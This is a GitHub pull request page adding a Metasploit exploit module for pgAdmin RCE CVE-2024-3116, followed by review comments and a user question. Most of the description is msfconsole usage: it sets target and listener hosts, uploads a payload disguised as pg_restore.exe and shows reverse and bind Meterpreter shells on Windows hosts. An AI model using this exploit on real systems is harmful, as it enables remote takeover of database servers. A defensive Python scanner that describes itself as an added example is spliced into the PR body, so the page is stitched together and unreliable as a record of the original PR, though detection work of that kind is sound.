
pgAdmin 8.4 RCE / CVE-2024-3116 #19422

Merged: 8 commits, Aug 28, 2024

Conversation

igomeow (Contributor) commented Aug 26, 2024

pgAdmin versions up to 8.4 are vulnerable to a Remote Code Execution (RCE) (CVE-2024-3116) flaw through the validate binary path API.
This vulnerability allows attackers to run arbitrary code on the server hosting pgAdmin, which poses a significant
threat to the integrity of the database management system and the security of its underlying data.

The exploit can be executed in both authenticated and unauthenticated scenarios. When valid credentials are available,
Metasploit can log in to pgAdmin, upload a malicious payload using the file management plugin, and then execute it via
the validate_binary_path endpoint. This vulnerability is specific to Windows targets. If authentication is not required
by the application, Metasploit can directly upload and trigger the payload through the validate_binary_path endpoint.

Verification

pgAdmin 8.4 on Windows (Authenticated)

msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(windows/http/pgadmin_binary_path_api) > set USERNAME [email protected]
USERNAME => [email protected]
msf6 exploit(windows/http/pgadmin_binary_path_api) > set PASSWORD 123456
PASSWORD => 123456
msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 
LHOST => 192.168.1.6
msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit 

[*] Started reverse TCP handler on 192.168.1.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. pgAdmin version 8.4.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Payload uploaded to: C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe
[*] Sending stage (201798 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.5:52588) at 2024-08-26 19:48:10 +0200
[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe' on the target

meterpreter > sysinfo
Computer        : DESKTOP-FMNV75N
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 

pgAdmin 8.4 on Windows (Unauthenticated)

msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.7
RHOSTS => 192.168.1.7
msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 
LHOST => 192.168.1.6
msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit 

[*] Started reverse TCP handler on 192.168.1.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. pgAdmin version 8.4.0 is affected
[*] Payload uploaded to: C:\Users\pgAdmin\pg_restore.exe
[*] Sending stage (200774 bytes) to 192.168.1.7
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.7:55560) at 2024-08-26 19:51:01 +0200
[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\pg_restore.exe' on the target

meterpreter > sysinfo
Computer        : DESKTOP-HTGS43E
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
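A defender-side check that follows from the session output above: in both scenarios the payload lands on disk as a file named after a PostgreSQL client utility (pg_restore.exe) inside pgAdmin's per-user storage tree, and the validate_binary_path API is then pointed at that directory. The following scanner walks a pgAdmin storage directory and flags such files. This is an added example, not code from the Metasploit module or from pgAdmin; the per-user directory layout (storage/<email with @ replaced by _>/), the set of utility names and the list of executable suffixes are assumptions made for the example.

```python
"""Scan a pgAdmin storage directory for dropped PostgreSQL-utility lookalikes.

Added example (not part of the Metasploit module or of pgAdmin). Rationale:
the PR's session output shows the payload written to
<storage>/<user>/pg_restore.exe and then triggered through the
validate_binary_path API, so an executable named after a PostgreSQL client
utility inside the storage tree is a strong indicator of this technique.
"""
import os
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple, Union

# PostgreSQL client utilities the binary-path validator is assumed to probe.
UTILITY_NAMES = {"pg_dump", "pg_dumpall", "pg_restore", "psql"}
# Suffixes treated as executable on Windows (heuristic, assumption).
EXEC_SUFFIXES = {".exe", ".bat", ".cmd", ".ps1", ".com"}


def classify(path: Union[str, Path]) -> Optional[str]:
    """Return a finding label for one file, or None if it looks benign.

    A utility-named file is flagged regardless of suffix, so the check also
    covers extension-less Linux builds; any other executable suffix inside
    storage is flagged with a weaker label.
    """
    p = Path(path)
    if p.stem.lower() in UTILITY_NAMES:
        return "utility-lookalike"
    if p.suffix.lower() in EXEC_SUFFIXES:
        return "executable-in-storage"
    return None


def find_suspicious_storage_files(storage_root: Union[str, Path]) -> List[Tuple[str, str]]:
    """Walk storage_root and return sorted (relative_posix_path, reason) pairs."""
    root = Path(storage_root)
    findings: List[Tuple[str, str]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = Path(dirpath) / name
            reason = classify(full)
            if reason is not None:
                findings.append((full.relative_to(root).as_posix(), reason))
    return sorted(findings)


def build_demo_storage() -> str:
    """Create a constructed storage tree in a temp dir (sample data, not real)."""
    root = Path(tempfile.mkdtemp(prefix="pgadmin_storage_"))
    sample = {
        "test_test.com/pg_restore.exe": b"MZ-constructed-sample",  # mirrors the PR's drop path
        "test_test.com/backup.sql": b"-- harmless dump",
        "other_user/notes.txt": b"plain text",
        "other_user/helper.bat": b"@echo off",
    }
    for rel, data in sample.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return str(root)


if __name__ == "__main__":
    demo_root = build_demo_storage()
    for rel_path, why in find_suspicious_storage_files(demo_root):
        print(f"{why:22s} {rel_path}")
```

Run it against the real storage directory of a pgAdmin install (the path shown in the "manual cleanup" line of the session output is a good starting point) rather than the constructed demo tree; a "utility-lookalike" hit in a user's storage folder warrants an immediate look at that host.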

igomeow changed the title from "Pg admin8 4 rce" to "pgAdmin 8.4 RCE / CVE-2024-3116" Aug 26, 2024
adfoster-r7 self-assigned this Aug 26, 2024
adfoster-r7 (Contributor)

@igomeow Just for visibility - we've got a release planned for tomorrow morning, if the PR feedback is applied today then we'd be able to get this landed and shipped in time I think! 🤞

igomeow (Contributor, Author) commented Aug 28, 2024

@igomeow Just for visibility - we've got a release planned for tomorrow morning, if the PR feedback is applied today then we'd be able to get this landed and shipped in time I think! 🤞

@adfoster-r7 I've processed all the feedback; I hope I have completed it on time.

adfoster-r7 (Contributor)

testing against 7.4:

msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit rhost=192.168.123.131 rport=5050 lhost=192.168.123.1 [email protected] password=password httptrace=true payload=windows/x64/meterpreter/bind_tcp

...
####################
# Response:
####################
No response received
[*] Started bind TCP handler against 192.168.123.131:4444
[*] Sending stage (201798 bytes) to 192.168.123.131
[*] Meterpreter session 1 opened (192.168.123.1:56994 -> 192.168.123.131:4444) at 2024-08-28 18:43:01 +0100
[!] This exploit may require manual cleanup of 'C:\Users\Administrator\AppData\Roaming\pgAdmin\storage\test_example.com/pg_restore.exe' on the target

meterpreter > getuid
Server username: WIN-E0KMDDFCK37\Administrator
meterpreter > 

Looks good to me, thanks! Will land once CI is finished.

adfoster-r7 merged commit fabb5d1 into rapid7:master Aug 28, 2024
36 checks passed
adfoster-r7 added the label "rn-modules" (release notes for new or majorly enhanced modules) Aug 28, 2024
adfoster-r7 (Contributor)

Release Notes

Adds a new module targeting all versions of PgAdmin up to 8.4 which leverages a Remote Code Execution (RCE) CVE-2024-3116 flaw through the validate binary path API.

Prikass66

Hi, I have a question about the unauthenticated method. When I try to exploit with the module, msfconsole returns the error:

Exploit aborted due to failure: bad-config: The application requires authentication, please provide valid credentials

I see that you used 2 different virtual machines, one for each scenario. What is the difference between the pgAdmin configurations on these machines?
Btw, I found a small mistake in the 3rd step of the Verification Steps.
It says: use exploit/multi/http/pgadmin_binary_path_api
It should be: use exploit/windows/http/pgadmin_binary_path_api

igomeow (Contributor, Author) commented Sep 3, 2024

Hi, I have a question about the unauthenticated method. When I try to exploit with the module, msfconsole returns the error:

Exploit aborted due to failure: bad-config: The application requires authentication, please provide valid credentials

I see that you used 2 different virtual machines, one for each scenario. What is the difference between the pgAdmin configurations on these machines? Btw, I found a small mistake in the 3rd step of the Verification Steps. It says: use exploit/multi/http/pgadmin_binary_path_api. It should be: use exploit/windows/http/pgadmin_binary_path_api

Thanks for catching the typo in the documentation! I will fix it. One server requires a username/password to access the pgAdmin console, the other one doesn't. In your case, it seems pgAdmin requires a username/password, so you should provide valid credentials. If pgAdmin doesn't require any creds, please let me know which version it is. I will try to debug the problem.
